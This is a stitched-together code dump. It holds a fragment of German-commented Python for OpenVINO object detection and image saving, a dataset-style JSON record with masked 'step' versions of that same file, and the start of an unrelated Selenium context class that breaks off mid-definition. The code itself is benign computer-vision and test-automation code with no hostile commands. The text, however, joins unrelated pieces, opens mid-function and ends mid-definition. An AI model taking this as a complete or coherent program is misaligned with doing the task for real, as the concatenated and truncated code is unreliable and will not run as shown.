save_all=False): # Status Variablen n_infered, n_detected, n_saved = 0, 0, 0 # alle Inferenz Requests durchiterieren for inf_img_ind, infer_request in enumerate(self.exec_net.requests): res, frame = None, None # Status der Inferenz für aktuellen Request abfragen status = infer_request.wait(0) # 0: ergebnis da, -11: noch nicht gestartet if status != 0 and status != -11: continue # Ergebnis für aktuellen Request holen if inf_img_ind in self.current_frames: res = infer_request.outputs[self.out_blob] frame = self.current_frames[inf_img_ind] n_infered += 1 # neuen Inferent Request starten if len(buffer): self.current_frames[inf_img_ind] = buffer.pop() in_frame = cv2.resize( self.current_frames[inf_img_ind], (self.w, self.h)) in_frame = in_frame.transpose((2, 0, 1)) in_frame = in_frame.reshape( (self.n, self.c, self.h, self.w)) self.feed_dict[self.input_blob] = in_frame infer_request.async_infer(self.feed_dict) # Ergebnis verarbeiten if res is None or frame is None: continue height, width = frame.shape[:2] # inferenz ergebnisse für ein frame durchiterieren for obj in res[0][0]: # Threshold prüfen if obj[2] < threshhold: continue n_detected += 1 # Boundig Box koordinalte aus Erg laden xmin = int(obj[3] * width) ymin = int(obj[4] * height) xmax = int(obj[5] * width) ymax = int(obj[6] * height) # ID der erkannten Klasse class_id = int(obj[1]) # Bounding Box in das Bild zeichnen cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 255), thickness=2) cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7), cv2.FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1) # detected_objects dict anlegen mit key:class_id, value:[N, Roi, proba] if not class_id in self.detected_objects: self.detected_objects[class_id] = [ 0, frame, obj[2]] else: self.detected_objects[class_id][0] += 1 # wenn wahrscheinlichkeit höher als bei gespeicherten, ersetzen if self.detected_objects[class_id][2] < obj[2]: self.detected_objects[class_id][1] = frame self.detected_objects[class_id][2] = obj[2] # nach 'n_save' abspeicher if self.detected_objects[class_id][0] > n_save: n_saved += 1 self._save(class_id) del self.detected_objects[class_id] if view_result: cv2.imshow('infer result', frame) cv2.waitKey(1) # alle aus 'detected_objects' lokal speichern if save_all: print('saving all') for class_id in self.detected_objects.keys(): self._save(class_id) n_saved += 1 self.detected_objects = {} return n_infered, n_detected, n_saved # Funkiont zum speichern der Bilder def _save(self, class_id): class_name = self.labels[class_id - 1] print('saving ', class_name) time_stamp = datetime.now().strftime("%d-%b-%Y_%H-%M-%S") file_name = time_stamp + '_' + class_name + '.jpg' image_array = self.detected_objects[class_id][1] # save image local cv2.imwrite(os.path.join( self.output_dir, file_name), image_array)
normal
{ "blob_id": "fbd7868a37a2270e5dc86843adff50a94436404d", "index": 5899, "step-1": "<mask token>\n\n\nclass MotionDetect:\n\n def __init__(self):\n self.static_back = None\n <mask token>\n <mask token>\n\n\nclass InferenceModel:\n\n def __init__(self, device='MYRIAD'):\n self.ie = IECore()\n self.device = device\n\n def create_exec_infer_model(self, model_dir, output_dir, num_requests=2):\n model_xml = os.path.join(model_dir, 'frozen_inference_graph.xml')\n model_bin = os.path.join(model_dir, 'frozen_inference_graph.bin')\n exported_model = os.path.join(model_dir, 'exported_model')\n labels = [line.strip() for line in open(os.path.join(model_dir,\n 'classes.txt')).readlines()]\n assert os.path.isfile(model_bin)\n assert os.path.isfile(model_xml)\n net = IENetwork(model=model_xml, weights=model_bin)\n img_info_input_blob = None\n feed_dict = {}\n for blob_name in net.inputs:\n if len(net.inputs[blob_name].shape) == 4:\n input_blob = blob_name\n elif len(net.inputs[blob_name].shape) == 2:\n img_info_input_blob = blob_name\n else:\n raise RuntimeError(\n \"Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported\"\n .format(len(net.inputs[blob_name].shape), blob_name))\n assert len(net.outputs\n ) == 1, 'Demo supports only single output topologies'\n out_blob = next(iter(net.outputs))\n if os.path.isfile(exported_model):\n print('found model to import')\n try:\n exec_net = self.ie.import_network(model_file=exported_model,\n device_name=self.device, num_requests=num_requests)\n except:\n return False\n else:\n print('creating exec model')\n try:\n exec_net = self.ie.load_network(network=net, num_requests=\n num_requests, device_name=self.device)\n exec_net.export(exported_model)\n except:\n return False\n nchw = net.inputs[input_blob].shape\n del net\n if img_info_input_blob:\n feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1]\n return ExecInferModel(exec_net, input_blob, out_blob, feed_dict,\n nchw, labels, output_dir)\n\n\nclass ExecInferModel:\n\n def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw,\n labels, output_dir):\n self.exec_net = exec_net\n self.labels = labels\n self.input_blob = input_blob\n self.out_blob = out_blob\n self.feed_dict = feed_dict\n self.n, self.c, self.h, self.w = nchw\n self.current_frames = {}\n self.detected_objects = {}\n self.output_dir = output_dir\n\n def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save\n =20, save_all=False):\n n_infered, n_detected, n_saved = 0, 0, 0\n for inf_img_ind, infer_request in enumerate(self.exec_net.requests):\n res, frame = None, None\n status = infer_request.wait(0)\n if status != 0 and status != -11:\n continue\n if inf_img_ind in self.current_frames:\n res = infer_request.outputs[self.out_blob]\n frame = self.current_frames[inf_img_ind]\n n_infered += 1\n if len(buffer):\n self.current_frames[inf_img_ind] = buffer.pop()\n in_frame = cv2.resize(self.current_frames[inf_img_ind], (\n self.w, self.h))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape((self.n, self.c, self.h, self.w))\n self.feed_dict[self.input_blob] = in_frame\n infer_request.async_infer(self.feed_dict)\n if res is None or frame is None:\n continue\n height, width = frame.shape[:2]\n for obj in res[0][0]:\n if obj[2] < threshhold:\n continue\n n_detected += 1\n xmin = int(obj[3] * width)\n ymin = int(obj[4] * height)\n xmax = int(obj[5] * width)\n ymax = int(obj[6] * height)\n class_id = int(obj[1])\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, \n 255, 255), thickness=2)\n cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(\n round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7), cv2.\n FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1)\n if not class_id in self.detected_objects:\n self.detected_objects[class_id] = [0, frame, obj[2]]\n else:\n self.detected_objects[class_id][0] += 1\n if self.detected_objects[class_id][2] < obj[2]:\n self.detected_objects[class_id][1] = frame\n self.detected_objects[class_id][2] = obj[2]\n if self.detected_objects[class_id][0] > n_save:\n n_saved += 1\n self._save(class_id)\n del self.detected_objects[class_id]\n if view_result:\n cv2.imshow('infer result', frame)\n cv2.waitKey(1)\n if save_all:\n print('saving all')\n for class_id in self.detected_objects.keys():\n self._save(class_id)\n n_saved += 1\n self.detected_objects = {}\n return n_infered, n_detected, n_saved\n\n def _save(self, class_id):\n class_name = self.labels[class_id - 1]\n print('saving ', class_name)\n time_stamp = datetime.now().strftime('%d-%b-%Y_%H-%M-%S')\n file_name = time_stamp + '_' + class_name + '.jpg'\n image_array = self.detected_objects[class_id][1]\n cv2.imwrite(os.path.join(self.output_dir, file_name), image_array)\n", "step-2": "<mask token>\n\n\nclass MotionDetect:\n\n def __init__(self):\n self.static_back = None\n\n def detect_motion(self, frame, reset=False):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if self.static_back is None or reset:\n self.static_back = gray\n return False\n diff_frame = cv2.absdiff(self.static_back, gray)\n thresh_frame = cv2.threshold(diff_frame, 50, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n if cnts:\n return True\n else:\n return False\n <mask token>\n\n\nclass InferenceModel:\n\n def __init__(self, device='MYRIAD'):\n self.ie = IECore()\n self.device = device\n\n def create_exec_infer_model(self, model_dir, output_dir, num_requests=2):\n model_xml = os.path.join(model_dir, 'frozen_inference_graph.xml')\n model_bin = os.path.join(model_dir, 'frozen_inference_graph.bin')\n exported_model = os.path.join(model_dir, 'exported_model')\n labels = [line.strip() for line in open(os.path.join(model_dir,\n 'classes.txt')).readlines()]\n assert os.path.isfile(model_bin)\n assert os.path.isfile(model_xml)\n net = IENetwork(model=model_xml, weights=model_bin)\n img_info_input_blob = None\n feed_dict = {}\n for blob_name in net.inputs:\n if len(net.inputs[blob_name].shape) == 4:\n input_blob = blob_name\n elif len(net.inputs[blob_name].shape) == 2:\n img_info_input_blob = blob_name\n else:\n raise RuntimeError(\n \"Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported\"\n .format(len(net.inputs[blob_name].shape), blob_name))\n assert len(net.outputs\n ) == 1, 'Demo supports only single output topologies'\n out_blob = next(iter(net.outputs))\n if os.path.isfile(exported_model):\n print('found model to import')\n try:\n exec_net = self.ie.import_network(model_file=exported_model,\n device_name=self.device, num_requests=num_requests)\n except:\n return False\n else:\n print('creating exec model')\n try:\n exec_net = self.ie.load_network(network=net, num_requests=\n num_requests, device_name=self.device)\n exec_net.export(exported_model)\n except:\n return False\n nchw = net.inputs[input_blob].shape\n del net\n if img_info_input_blob:\n feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1]\n return ExecInferModel(exec_net, input_blob, out_blob, feed_dict,\n nchw, labels, output_dir)\n\n\nclass ExecInferModel:\n\n def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw,\n labels, output_dir):\n self.exec_net = exec_net\n self.labels = labels\n self.input_blob = input_blob\n self.out_blob = out_blob\n self.feed_dict = feed_dict\n self.n, self.c, self.h, self.w = nchw\n self.current_frames = {}\n self.detected_objects = {}\n self.output_dir = output_dir\n\n def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save\n =20, save_all=False):\n n_infered, n_detected, n_saved = 0, 0, 0\n for inf_img_ind, infer_request in enumerate(self.exec_net.requests):\n res, frame = None, None\n status = infer_request.wait(0)\n if status != 0 and status != -11:\n continue\n if inf_img_ind in self.current_frames:\n res = infer_request.outputs[self.out_blob]\n frame = self.current_frames[inf_img_ind]\n n_infered += 1\n if len(buffer):\n self.current_frames[inf_img_ind] = buffer.pop()\n in_frame = cv2.resize(self.current_frames[inf_img_ind], (\n self.w, self.h))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape((self.n, self.c, self.h, self.w))\n self.feed_dict[self.input_blob] = in_frame\n infer_request.async_infer(self.feed_dict)\n if res is None or frame is None:\n continue\n height, width = frame.shape[:2]\n for obj in res[0][0]:\n if obj[2] < threshhold:\n continue\n n_detected += 1\n xmin = int(obj[3] * width)\n ymin = int(obj[4] * height)\n xmax = int(obj[5] * width)\n ymax = int(obj[6] * height)\n class_id = int(obj[1])\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, \n 255, 255), thickness=2)\n cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(\n round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7), cv2.\n FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1)\n if not class_id in self.detected_objects:\n self.detected_objects[class_id] = [0, frame, obj[2]]\n else:\n self.detected_objects[class_id][0] += 1\n if self.detected_objects[class_id][2] < obj[2]:\n self.detected_objects[class_id][1] = frame\n self.detected_objects[class_id][2] = obj[2]\n if self.detected_objects[class_id][0] > n_save:\n n_saved += 1\n self._save(class_id)\n del self.detected_objects[class_id]\n if view_result:\n cv2.imshow('infer result', frame)\n cv2.waitKey(1)\n if save_all:\n print('saving all')\n for class_id in self.detected_objects.keys():\n self._save(class_id)\n n_saved += 1\n self.detected_objects = {}\n return n_infered, n_detected, n_saved\n\n def _save(self, class_id):\n class_name = self.labels[class_id - 1]\n print('saving ', class_name)\n time_stamp = datetime.now().strftime('%d-%b-%Y_%H-%M-%S')\n file_name = time_stamp + '_' + class_name + '.jpg'\n image_array = self.detected_objects[class_id][1]\n cv2.imwrite(os.path.join(self.output_dir, file_name), image_array)\n", "step-3": "<mask token>\n\n\nclass MotionDetect:\n\n def __init__(self):\n self.static_back = None\n\n def detect_motion(self, frame, reset=False):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if self.static_back is None or reset:\n self.static_back = gray\n return False\n diff_frame = cv2.absdiff(self.static_back, gray)\n thresh_frame = cv2.threshold(diff_frame, 50, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n if cnts:\n return True\n else:\n return False\n\n def reset_background(self):\n self.static_back = None\n\n\nclass InferenceModel:\n\n def __init__(self, device='MYRIAD'):\n self.ie = IECore()\n self.device = device\n\n def create_exec_infer_model(self, model_dir, output_dir, num_requests=2):\n model_xml = os.path.join(model_dir, 'frozen_inference_graph.xml')\n model_bin = os.path.join(model_dir, 'frozen_inference_graph.bin')\n exported_model = os.path.join(model_dir, 'exported_model')\n labels = [line.strip() for line in open(os.path.join(model_dir,\n 'classes.txt')).readlines()]\n assert os.path.isfile(model_bin)\n assert os.path.isfile(model_xml)\n net = IENetwork(model=model_xml, weights=model_bin)\n img_info_input_blob = None\n feed_dict = {}\n for blob_name in net.inputs:\n if len(net.inputs[blob_name].shape) == 4:\n input_blob = blob_name\n elif len(net.inputs[blob_name].shape) == 2:\n img_info_input_blob = blob_name\n else:\n raise RuntimeError(\n \"Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported\"\n .format(len(net.inputs[blob_name].shape), blob_name))\n assert len(net.outputs\n ) == 1, 'Demo supports only single output topologies'\n out_blob = next(iter(net.outputs))\n if os.path.isfile(exported_model):\n print('found model to import')\n try:\n exec_net = self.ie.import_network(model_file=exported_model,\n device_name=self.device, num_requests=num_requests)\n except:\n return False\n else:\n print('creating exec model')\n try:\n exec_net = self.ie.load_network(network=net, num_requests=\n num_requests, device_name=self.device)\n exec_net.export(exported_model)\n except:\n return False\n nchw = net.inputs[input_blob].shape\n del net\n if img_info_input_blob:\n feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1]\n return ExecInferModel(exec_net, input_blob, out_blob, feed_dict,\n nchw, labels, output_dir)\n\n\nclass ExecInferModel:\n\n def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw,\n labels, output_dir):\n self.exec_net = exec_net\n self.labels = labels\n self.input_blob = input_blob\n self.out_blob = out_blob\n self.feed_dict = feed_dict\n self.n, self.c, self.h, self.w = nchw\n self.current_frames = {}\n self.detected_objects = {}\n self.output_dir = output_dir\n\n def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save\n =20, save_all=False):\n n_infered, n_detected, n_saved = 0, 0, 0\n for inf_img_ind, infer_request in enumerate(self.exec_net.requests):\n res, frame = None, None\n status = infer_request.wait(0)\n if status != 0 and status != -11:\n continue\n if inf_img_ind in self.current_frames:\n res = infer_request.outputs[self.out_blob]\n frame = self.current_frames[inf_img_ind]\n n_infered += 1\n if len(buffer):\n self.current_frames[inf_img_ind] = buffer.pop()\n in_frame = cv2.resize(self.current_frames[inf_img_ind], (\n self.w, self.h))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape((self.n, self.c, self.h, self.w))\n self.feed_dict[self.input_blob] = in_frame\n infer_request.async_infer(self.feed_dict)\n if res is None or frame is None:\n continue\n height, width = frame.shape[:2]\n for obj in res[0][0]:\n if obj[2] < threshhold:\n continue\n n_detected += 1\n xmin = int(obj[3] * width)\n ymin = int(obj[4] * height)\n xmax = int(obj[5] * width)\n ymax = int(obj[6] * height)\n class_id = int(obj[1])\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, \n 255, 255), thickness=2)\n cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(\n round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7), cv2.\n FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1)\n if not class_id in self.detected_objects:\n self.detected_objects[class_id] = [0, frame, obj[2]]\n else:\n self.detected_objects[class_id][0] += 1\n if self.detected_objects[class_id][2] < obj[2]:\n self.detected_objects[class_id][1] = frame\n self.detected_objects[class_id][2] = obj[2]\n if self.detected_objects[class_id][0] > n_save:\n n_saved += 1\n self._save(class_id)\n del self.detected_objects[class_id]\n if view_result:\n cv2.imshow('infer result', frame)\n cv2.waitKey(1)\n if save_all:\n print('saving all')\n for class_id in self.detected_objects.keys():\n self._save(class_id)\n n_saved += 1\n self.detected_objects = {}\n return n_infered, n_detected, n_saved\n\n def _save(self, class_id):\n class_name = self.labels[class_id - 1]\n print('saving ', class_name)\n time_stamp = datetime.now().strftime('%d-%b-%Y_%H-%M-%S')\n file_name = time_stamp + '_' + class_name + '.jpg'\n image_array = self.detected_objects[class_id][1]\n cv2.imwrite(os.path.join(self.output_dir, file_name), image_array)\n", "step-4": "from openvino.inference_engine import IENetwork, IECore\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport sys\nimport os\nimport cv2\n\n\nclass MotionDetect:\n\n def __init__(self):\n self.static_back = None\n\n def detect_motion(self, frame, reset=False):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if self.static_back is None or reset:\n self.static_back = gray\n return False\n diff_frame = cv2.absdiff(self.static_back, gray)\n thresh_frame = cv2.threshold(diff_frame, 50, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n if cnts:\n return True\n else:\n return False\n\n def reset_background(self):\n self.static_back = None\n\n\nclass InferenceModel:\n\n def __init__(self, device='MYRIAD'):\n self.ie = IECore()\n self.device = device\n\n def create_exec_infer_model(self, model_dir, output_dir, num_requests=2):\n model_xml = os.path.join(model_dir, 'frozen_inference_graph.xml')\n model_bin = os.path.join(model_dir, 'frozen_inference_graph.bin')\n exported_model = os.path.join(model_dir, 'exported_model')\n labels = [line.strip() for line in open(os.path.join(model_dir,\n 'classes.txt')).readlines()]\n assert os.path.isfile(model_bin)\n assert os.path.isfile(model_xml)\n net = IENetwork(model=model_xml, weights=model_bin)\n img_info_input_blob = None\n feed_dict = {}\n for blob_name in net.inputs:\n if len(net.inputs[blob_name].shape) == 4:\n input_blob = blob_name\n elif len(net.inputs[blob_name].shape) == 2:\n img_info_input_blob = blob_name\n else:\n raise RuntimeError(\n \"Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported\"\n .format(len(net.inputs[blob_name].shape), blob_name))\n assert len(net.outputs\n ) == 1, 'Demo supports only single output topologies'\n out_blob = next(iter(net.outputs))\n if os.path.isfile(exported_model):\n print('found model to import')\n try:\n exec_net = self.ie.import_network(model_file=exported_model,\n device_name=self.device, num_requests=num_requests)\n except:\n return False\n else:\n print('creating exec model')\n try:\n exec_net = self.ie.load_network(network=net, num_requests=\n num_requests, device_name=self.device)\n exec_net.export(exported_model)\n except:\n return False\n nchw = net.inputs[input_blob].shape\n del net\n if img_info_input_blob:\n feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1]\n return ExecInferModel(exec_net, input_blob, out_blob, feed_dict,\n nchw, labels, output_dir)\n\n\nclass ExecInferModel:\n\n def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw,\n labels, output_dir):\n self.exec_net = exec_net\n self.labels = labels\n self.input_blob = input_blob\n self.out_blob = out_blob\n self.feed_dict = feed_dict\n self.n, self.c, self.h, self.w = nchw\n self.current_frames = {}\n self.detected_objects = {}\n self.output_dir = output_dir\n\n def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save\n =20, save_all=False):\n n_infered, n_detected, n_saved = 0, 0, 0\n for inf_img_ind, infer_request in enumerate(self.exec_net.requests):\n res, frame = None, None\n status = infer_request.wait(0)\n if status != 0 and status != -11:\n continue\n if inf_img_ind in self.current_frames:\n res = infer_request.outputs[self.out_blob]\n frame = self.current_frames[inf_img_ind]\n n_infered += 1\n if len(buffer):\n self.current_frames[inf_img_ind] = buffer.pop()\n in_frame = cv2.resize(self.current_frames[inf_img_ind], (\n self.w, self.h))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape((self.n, self.c, self.h, self.w))\n self.feed_dict[self.input_blob] = in_frame\n infer_request.async_infer(self.feed_dict)\n if res is None or frame is None:\n continue\n height, width = frame.shape[:2]\n for obj in res[0][0]:\n if obj[2] < threshhold:\n continue\n n_detected += 1\n xmin = int(obj[3] * width)\n ymin = int(obj[4] * height)\n xmax = int(obj[5] * width)\n ymax = int(obj[6] * height)\n class_id = int(obj[1])\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, \n 255, 255), thickness=2)\n cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(\n round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7), cv2.\n FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1)\n if not class_id in self.detected_objects:\n self.detected_objects[class_id] = [0, frame, obj[2]]\n else:\n self.detected_objects[class_id][0] += 1\n if self.detected_objects[class_id][2] < obj[2]:\n self.detected_objects[class_id][1] = frame\n self.detected_objects[class_id][2] = obj[2]\n if self.detected_objects[class_id][0] > n_save:\n n_saved += 1\n self._save(class_id)\n del self.detected_objects[class_id]\n if view_result:\n cv2.imshow('infer result', frame)\n cv2.waitKey(1)\n if save_all:\n print('saving all')\n for class_id in self.detected_objects.keys():\n self._save(class_id)\n n_saved += 1\n self.detected_objects = {}\n return n_infered, n_detected, n_saved\n\n def _save(self, class_id):\n class_name = self.labels[class_id - 1]\n print('saving ', class_name)\n time_stamp = datetime.now().strftime('%d-%b-%Y_%H-%M-%S')\n file_name = time_stamp + '_' + class_name + '.jpg'\n image_array = self.detected_objects[class_id][1]\n cv2.imwrite(os.path.join(self.output_dir, file_name), image_array)\n", "step-5": "from openvino.inference_engine import IENetwork, IECore\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport sys\nimport os\nimport cv2\n\n\nclass MotionDetect:\n # Klasse zur Erkennung von Bewegung\n def __init__(self):\n self.static_back = None\n\n def detect_motion(self, frame, reset=False):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if self.static_back is None or reset:\n self.static_back = gray\n return False\n diff_frame = cv2.absdiff(self.static_back, gray)\n thresh_frame = cv2.threshold(diff_frame, 50, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n cnts, _ = cv2.findContours(thresh_frame.copy(),\n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n if cnts:\n return True\n else:\n return False\n\n def reset_background(self):\n self.static_back = None\n\n\nclass InferenceModel:\n # Klasse zur Erstellung eines 'ExecInferModel' Objekts\n def __init__(self, device='MYRIAD'):\n self.ie = IECore()\n self.device = device\n\n def create_exec_infer_model(self, model_dir, output_dir, num_requests=2):\n\n # Anlegen der Pfade zu den Modell Dateien\n model_xml = os.path.join(\n model_dir, 'frozen_inference_graph.xml')\n model_bin = os.path.join(\n model_dir, 'frozen_inference_graph.bin')\n exported_model = os.path.join(model_dir, 'exported_model')\n\n # Laden der Labels aus 'classes.txt'\n labels = [line.strip() for line in open(\n os.path.join(model_dir, 'classes.txt')).readlines()]\n\n assert os.path.isfile(model_bin)\n assert os.path.isfile(model_xml)\n\n # Erstellung des Modells aus IR Dateien\n net = IENetwork(model=model_xml, weights=model_bin)\n\n # In-Output Shapes des Modells aus 'net' laden\n img_info_input_blob = None\n feed_dict = {}\n for blob_name in net.inputs:\n if len(net.inputs[blob_name].shape) == 4:\n input_blob = blob_name\n elif len(net.inputs[blob_name].shape) == 2:\n img_info_input_blob = blob_name\n else:\n raise RuntimeError(\"Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported\"\n .format(len(net.inputs[blob_name].shape), blob_name))\n\n assert len(\n net.outputs) == 1, \"Demo supports only single output topologies\"\n out_blob = next(iter(net.outputs))\n\n # Modell importieren (Falls vorhanden)\n if os.path.isfile(exported_model):\n print('found model to import')\n try:\n exec_net = self.ie.import_network(\n model_file=exported_model, device_name=self.device, num_requests=num_requests)\n except:\n return False\n else:\n # sonst erstellen und exoportieren\n print('creating exec model')\n try:\n exec_net = self.ie.load_network(\n network=net, num_requests=num_requests, device_name=self.device)\n exec_net.export(exported_model)\n\n except:\n return False\n nchw = net.inputs[input_blob].shape\n\n del net\n if img_info_input_blob:\n feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1]\n\n # ersellen und zurückgeben eines ExecInferModel Objekts, mit welchem die Inferenz ausgeführt wird\n return ExecInferModel(exec_net, input_blob, out_blob, feed_dict, nchw, labels, output_dir)\n\n\nclass ExecInferModel:\n def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw, labels, output_dir):\n self.exec_net = exec_net\n self.labels = labels\n self.input_blob = input_blob\n self.out_blob = out_blob\n self.feed_dict = feed_dict\n self.n, self.c, self.h, self.w = nchw\n self.current_frames = {}\n self.detected_objects = {}\n self.output_dir = output_dir\n\n def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save=20, save_all=False):\n\n # Status Variablen\n n_infered, n_detected, n_saved = 0, 0, 0\n\n # alle Inferenz Requests durchiterieren\n for inf_img_ind, infer_request in enumerate(self.exec_net.requests):\n\n res, frame = None, None\n\n # Status der Inferenz für aktuellen Request abfragen\n status = infer_request.wait(0)\n\n # 0: ergebnis da, -11: noch nicht gestartet\n if status != 0 and status != -11:\n continue\n\n # Ergebnis für aktuellen Request holen\n if inf_img_ind in self.current_frames:\n res = infer_request.outputs[self.out_blob]\n frame = self.current_frames[inf_img_ind]\n n_infered += 1\n\n # neuen Inferent Request starten\n if len(buffer):\n self.current_frames[inf_img_ind] = buffer.pop()\n in_frame = cv2.resize(\n self.current_frames[inf_img_ind], (self.w, self.h))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape(\n (self.n, self.c, self.h, self.w))\n self.feed_dict[self.input_blob] = in_frame\n infer_request.async_infer(self.feed_dict)\n\n # Ergebnis verarbeiten\n if res is None or frame is None:\n continue\n\n height, width = frame.shape[:2]\n # inferenz ergebnisse für ein frame durchiterieren\n for obj in res[0][0]:\n\n # Threshold prüfen\n if obj[2] < threshhold:\n continue\n\n n_detected += 1\n\n # Boundig Box koordinalte aus Erg laden\n xmin = int(obj[3] * width)\n ymin = int(obj[4] * height)\n xmax = int(obj[5] * width)\n ymax = int(obj[6] * height)\n\n # ID der erkannten Klasse\n class_id = int(obj[1])\n\n # Bounding Box in das Bild zeichnen\n cv2.rectangle(frame, (xmin, ymin),\n (xmax, ymax), color=(0, 255, 255), thickness=2)\n\n cv2.putText(frame, self.labels[class_id - 1] + ' ' + str(round(obj[2] * 100, 1)) + '%', (xmin, ymin - 7),\n cv2.FONT_HERSHEY_COMPLEX, 0.6, (0, 255, 255), 1)\n\n # detected_objects dict anlegen mit key:class_id, value:[N, Roi, proba]\n if not class_id in self.detected_objects:\n self.detected_objects[class_id] = [\n 0, frame, obj[2]]\n else:\n self.detected_objects[class_id][0] += 1\n # wenn wahrscheinlichkeit höher als bei gespeicherten, ersetzen\n if self.detected_objects[class_id][2] < obj[2]:\n self.detected_objects[class_id][1] = frame\n self.detected_objects[class_id][2] = obj[2]\n\n # nach 'n_save' abspeicher\n if self.detected_objects[class_id][0] > n_save:\n n_saved += 1\n self._save(class_id)\n del self.detected_objects[class_id]\n if view_result:\n cv2.imshow('infer result', frame)\n cv2.waitKey(1)\n\n # alle aus 'detected_objects' lokal speichern\n if save_all:\n print('saving all')\n for class_id in self.detected_objects.keys():\n self._save(class_id)\n n_saved += 1\n self.detected_objects = {}\n return n_infered, n_detected, n_saved\n\n # Funkiont zum speichern der Bilder\n def _save(self, class_id):\n class_name = self.labels[class_id - 1]\n print('saving ', class_name)\n time_stamp = datetime.now().strftime(\"%d-%b-%Y_%H-%M-%S\")\n file_name = time_stamp + '_' + class_name + '.jpg'\n image_array = self.detected_objects[class_id][1]\n # save image local\n cv2.imwrite(os.path.join(\n self.output_dir, file_name), image_array)\n", "step-ids": [ 9, 10, 11, 12, 13 ] }
[ 9, 10, 11, 12, 13 ]
from selenium import selenium class SharedSeleniumExecutionContext: host =None port =None browserStartCommand =None url = None seleniumInstance=None isInitialized=False lastVisitedLocation=None optionBeingHandled=None itemToDrag=None def __init__(self, host, port, browserStartCommand, url): if SharedSeleniumExecutionContext.seleniumInstance == None: SharedSeleniumExecutionContext.seleniumInstance = selenium(host, port, browserStartCommand, url) self.seleniumInstance = SharedSeleniumExecutionContext.seleniumInstance self.isInitialized = SharedSeleniumExecutionContext.isInitialized self.setBrowserStartCommand(browserStartCommand) self.setPort(port) self.setURL(url) self.setHost(host) self.setLastVisitedLocation() self.setOptionBeingHandled() self.setItemToDrag() def setPort(self, port): self.port = port SharedSeleniumExecutionContext.port = port SharedSeleniumExecutionContext.seleniumInstance.port = port def setHost(self, host): self.host = host SharedSeleniumExecutionContext.host= host SharedSeleniumExecutionContext.seleniumInstance.host = host def setBrowserStartCommand(self, browserStartCommand): self.browserStartCommand = browserStartCommand SharedSeleniumExecutionContext.__browserStartCommand = browserStartCommand SharedSeleniumExecutionContext.seleniumInstance.browserStartCommand = browserStartCommand def setURL(self, url): self.url = url SharedSeleniumExecutionContext.url = url SharedSeleniumExecutionContext.seleniumInstance.browserURL = url def setLastVisitedLocation(self, location=None): self.lastVisitedLocation = location SharedSeleniumExecutionContext.lastVisitedLocation = location def 